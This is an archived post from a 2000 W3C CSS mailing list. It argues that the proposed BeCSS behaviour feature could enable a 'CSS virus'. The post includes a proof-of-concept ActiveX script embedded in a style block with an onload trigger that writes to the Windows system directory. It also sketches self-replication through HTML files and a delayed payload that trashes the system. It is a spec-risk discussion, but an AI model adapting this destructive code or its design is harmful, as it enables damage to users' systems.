Re: virus? from Matthew Brealey on 2000-08-03 (www-style@w3.org from August 2000)

From: Matthew Brealey <webmaster@richinstyle.com>
Date: Thu, 03 Aug 2000 17:00:16 +0100
To: www-style@w3.org
Message-ID: <39899710.1635@richinstyle.com>
I wrote:
> 
> Bruno wrote:
> >
> > I was just wondering where there or is there any CSS virus?
> 
> Using the BeCSS proposal it is possible to format your hard drive. This
> can be achieved by setting as the element's 'behavior' the instantiation
> of an ActiveX control. ActiveX controls can doing anything - in
> particular the execution of an external program - such a program might
> be one that trashes your hard drive's partition tables (only possible on
> IDE drives).
> 
> However, this is a problem not limited to CSS, and is really a problem
> with ActiveX.

Here is my attempt at writing a CSS virus. Here's a script:

script
	obj = new ActiveXObject("Scripting.FileSystemObject");
	obj.CreateTextFile("c:\\windows\\system\\user.exe");
	thing=obj.GetFile("c:\\windows\\system\\user.exe");
/script

(<> removed in case it kills anyone's system)

This will currently destroy anyone's system (note: this is hardcoded for
Win9x - a better version would work for other directory names; other
files would work just as well), if it is placed in a web page and 

the user has selected 'low security' (this will destroy it
automatically)
the user has selected 'medium security' and they select 'Yes' in
response to the question: 'An ActiveX control on this page might be
unsafe to interact with other parts of the page. Do you want to allow
this interaction?'
the user has selected 'medium security' (default) and the script is
signed

It would be embedded as CSS thus:

style type="text/css" 			add <>
@script {
function screw() {
	TriStateFalse=0; 
	ForWriting=2;
	obj = new ActiveXObject("Scripting.FileSystemObject");
	obj.CreateTextFile("c:\\windows\\system\\user.exe");
	thing=obj.GetFile("c:\\windows\\system\\user.exe");
}
}	
body {onload: "screw()"} 
</style>

(To crash the system immediately, overwrite the swap file as well.)

Unfortunately it doesn't really qualify as a virus, more a trojan horse,
but I was unable to get it to work as a virus - I tried adding:

	TriStateFalse=0; 
	ForWriting=2;
	doit=thing.OpenAsTextStream(ForWriting, TristateFalse);
	doit.Write("viruscodehere");
	doit.Close();

but it didn't work.

Obviously, even if this code worked, it would need significant
enhancements:

to replicate well, it should go through each HTML file on the system
(although not all at once)
it needs a payload: this could easily be done - add a cookie and after a
certain number of runs (to ensure maximum replication of the virus)
trash the system


To work, this requires: 
a browser supporting BeCSS
the Windows Scripting Host
Internet Explorer



Thus, I believe it is possible to produce a CSS virus, which is not cool
at all, particularly in view of the stuff in CSS1 about CSS not becoming
a programming language (it didn't say CSS wouldn't become a virus, but I
suppose that was obvious).

-----------------------------------
Please visit http://RichInStyle.com. Featuring:
MySite: customizable styles.         AlwaysWork style 
Browser bug table covering all CSS2 with links to descriptions.
Lists of > 1000 browser bugs         Websafe Colorizer 
CSS2, CSS1 and HTML4 tutorials.      CSS masterclass 
CSS2 test suite: 5000++ tests and 300+ test pages.
Received on Thursday, 3 August 2000 12:01:05 UTC